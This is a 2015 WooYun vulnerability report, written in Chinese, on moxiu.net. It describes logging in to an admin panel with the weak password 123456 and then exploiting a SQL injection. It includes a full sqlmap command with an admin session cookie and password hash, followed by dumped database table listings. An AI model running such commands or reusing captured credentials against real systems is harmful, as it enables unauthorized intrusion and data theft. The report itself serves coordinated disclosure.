当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095532

漏洞标题:魔秀主题某站SQL注入可脱多个数据库系列之一

相关厂商:moxiu.com

漏洞作者: Ton7BrEak

提交时间:2015-02-10 10:23

修复时间:2015-03-27 10:24

公开时间:2015-03-27 10:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-10: 细节已通知厂商并且等待厂商处理中
2015-02-10: 厂商已经确认,细节仅向厂商公开
2015-02-20: 细节向核心白帽子及相关领域专家公开
2015-03-02: 细节向普通白帽子公开
2015-03-12: 细节向实习白帽子公开
2015-03-27: 细节向公众公开

简要描述:

公司年会抽奖提前说是“苹果牌笔记本”
一群人那个激动呀!抽奖的时候抽住的人那个激动呀!别提了!
结果你能想到么?居然是“苹果、牌、笔记本”!
看着他们的表情那是多么精彩呀!至今记忆幽深!
某站弱口令,从而方便进入后台。后台的SQL注入又让其他站沦陷。

详细说明:

001x今天看了下某IP下的C段,发现有魔秀的站点。显示的是moxiu.net。然后就用百度site:moxiu.net

001.jpg


这里是个后台 http://moxiu.net/mxadminv3/index.php?do=Login
整个页面没有验证码,也没有登录次数限制,而且有友好的报错提示,如下图

002.jpg

003.jpg


然后想了想,可以爆破。于是上burp,手动输入123456,在repeater里面没有看到报错信息,顿时出了一身冷汗,密码居然是123456

漏洞证明:

001x直接进入后台

004.jpg


002x后台管理内容挺多的,这里是后台的管理。

005.jpg


006.jpg


003x这里是官网的管理后台

007.jpg


008.jpg


004x最后一点是SQL注入,由于SQL注入地址是需要登录的,所以sqlmap使用时加上了cookie的值

sqlmap.py -u "http://moxiu.net/mxadminv3/index.php?do=Portal.MoodRec.AddRec&kid=38" --cookie="ad_auth_new=a%3A7%3A%7Bs%3A5%3A%22uname%22%3Bs%3A5%3A%22admin%22%3Bs%3A4%3A%22upwd%22%3Bs%3A32%3A%227c648f675bbab6f20b54faa536c44dbc%22%3Bs%3A8%3A%22ismodify%22%3Bs%3A1%3A%220%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%220%22%3Bs%3A6%3A%22rankid%22%3Bs%3A1%3A%227%22%3Bs%3A8%3A%22rolename%22%3Bs%3A5%3A%22admin%22%3Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3B%7D; auditime=1422951398"


004x最后跑出的数据库如下

--dbs.jpg


coop_new.jpg


Database: mx_admin
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| ad_theme_search_down    | 6728953 |
| ad_feed                 | 846646  |
| ad_audit_record         | 823094  |
| android_weather         | 235744  |
| ad_user_verify          | 226446  |
| ad_edmail               | 194149  |
| ad_theme_digest         | 53452   |
| ad_audit_allocate       | 50637   |
| android_theme_home      | 26797   |
| ad_theme_second         | 17225   |
| ad_auth_theme           | 13898   |
| ad_audit_theme          | 13594   |
| android_theme_allocated | 12807   |
| ad_blog                 | 8468    |
| android_theme_test      | 6923    |
| ad_audit_stat           | 4756    |
| ad_violate_uid          | 4110    |
| ad_user_blacklist       | 2836    |
| ad_censor               | 2300    |
| ad_log                  | 1988    |
| ad_theme_week           | 1904    |
| android_theme_topic     | 1745    |
| ad_theme_week_android   | 1613    |
| ad_theme_day            | 1368    |
| ad_comment              | 1065    |
| ad_theme_week_symbian   | 707     |
| ad_user_week            | 664     |
| ad_auth_theme_audit     | 524     |
| ad_stat                 | 487     |
| ad_inspect_stat         | 463     |
| ad_commend_day          | 347     |
| ad_inspect_schedule     | 227     |
| android_notice          | 182     |
| ad_portal_bannar        | 169     |
| ad_auth_user_log        | 164     |
| ad_commend_week_android | 161     |
| ad_auth_user            | 157     |
| ad_commend_week_symbian | 141     |
| android_topic           | 130     |
| ad_soft_package         | 83      |
| mobile_cate_img         | 80      |
| ad_chinamobile          | 68      |
| mobile_ad               | 68      |
| android_rmd_soft        | 57      |
| ad_user_space           | 49      |
| mobile_notice           | 26      |
| mobile_search_fail      | 25      |
| ad_tags                 | 24      |
| android_theme_reserve   | 7       |
| android_home            | 5       |
| ad_audit_rule           | 1       |
| mobile_ad_rule          | 1       |
+-------------------------+---------+


Database: mx_admin_v3
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| ad_audit_record           | 20527466 |
| ad_feed                   | 2270858 |
| ad_log                    | 1777697 |
| ad_audit_record_201501_02 | 808286  |
| ad_user_verify            | 476775  |
| ad_delete_theme           | 226422  |
| ad_theme_second           | 164761  |
| ad_audit_theme            | 126600  |
| ad_theme_digest           | 104015  |
| ad_user_imgs              | 60041   |
| ad_auth_theme_audit       | 28846   |
| ad_audit_allocate         | 21298   |
| ad_auth_theme             | 16282   |
| ad_audit_stat             | 14391   |
| ad_auth_mood              | 9199    |
| ad_auth_album             | 6602    |
| ad_violate_uid            | 5490    |
| ad_censor                 | 2323    |
| ad_comment                | 1064    |
| ad_inspect_stat           | 806     |
| ad_rec_mxstar             | 676     |
| ad_rec_theme              | 644     |
| ad_auth_log               | 448     |
| ad_portal_bannar          | 210     |
| ad_auth_user_log          | 182     |
| ad_auth_user              | 174     |
| ad_portal_albumbannar_new | 119     |
| ad_rec_mood               | 70      |
| ad_tags                   | 60      |
| ad_admin                  | 48      |
| android_rmd_soft          | 43      |
| ad_album_rmd              | 32      |
| ad_rec_mood_gather        | 29      |
| ad_portal_albumbannar     | 27      |
| ad_friendlinks            | 24      |
| ad_admintype              | 18      |
| ad_portal_bannar_new      | 14      |
| ad_bannar                 | 12      |
| ad_client_qqmobilebannar  | 11      |
| ad_album_global_rmd       | 10      |
| ad_rec_theme_gather       | 2       |
| ad_audit_rule             | 1       |
+---------------------------+---------+


Database: mx_blog
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| wp_commentmeta         | 5084    |
| wp_comments            | 2780    |
| wp_postmeta            | 1901    |
| wp_yop_poll_logs       | 1861    |
| wp_posts               | 1674    |
| wp_options             | 394     |
| wp_term_relationships  | 202     |
| wp_usermeta            | 127     |
| wp_term_taxonomy       | 24      |
| wp_terms               | 24      |
| wp_yop_poll_answers    | 19      |
| wp_yop_poll_answermeta | 15      |
| wp_yop_poll_templates  | 15      |
| wp_users               | 6       |
| wp_yop_polls           | 6       |
| wp_yop_pollmeta        | 5       |
| wp_links               | 4       |
+------------------------+---------+


Database: mx_tiki
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| tiki_menu_options           | 387     |
| tiki_schema                 | 380     |
| tiki_actionlog              | 243     |
| tiki_user_preferences       | 131     |
| tiki_stats                  | 92      |
| tiki_preferences            | 83      |
| tiki_category_objects       | 67      |
| tiki_faq_questions          | 61      |
| tiki_categorized_objects    | 57      |
| tiki_faqs                   | 55      |
| tiki_files                  | 55      |
| tiki_objects                | 54      |
| tiki_sefurl_regex_out       | 53      |
| tiki_actionlog_conf         | 49      |
| tiki_tracker_options        | 43      |
| tiki_score                  | 30      |
| tiki_categories             | 10      |
| users_grouppermissions      | 7       |
| tiki_modules                | 6       |
| tiki_live_support_modules   | 5       |
| users_usergroups            | 5       |
| users_users                 | 5       |
| tiki_article_types          | 4       |
| tiki_menus                  | 4       |
| tiki_semantic_tokens        | 4       |
| tiki_comments               | 3       |
| tiki_file_galleries         | 3       |
| tiki_history                | 3       |
| tiki_integrator_rules       | 3       |
| users_groups                | 3       |
| tiki_live_support_operators | 2       |
| tiki_pages                  | 2       |
| tiki_user_postings          | 2       |
| tiki_group_inclusion        | 1       |
| tiki_html_pages             | 1       |
| tiki_integrator_reps        | 1       |
| tiki_live_support_requests  | 1       |
| tiki_semaphores             | 1       |
| tiki_trackers               | 1       |
| tiki_user_modules           | 1       |
+-----------------------------+---------+


修复方案:

弱口令修改密码,防sql注入

版权声明:转载请注明来源 Ton7BrEak@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-10 10:45

厂商回复:

非常感谢

最新状态:

暂无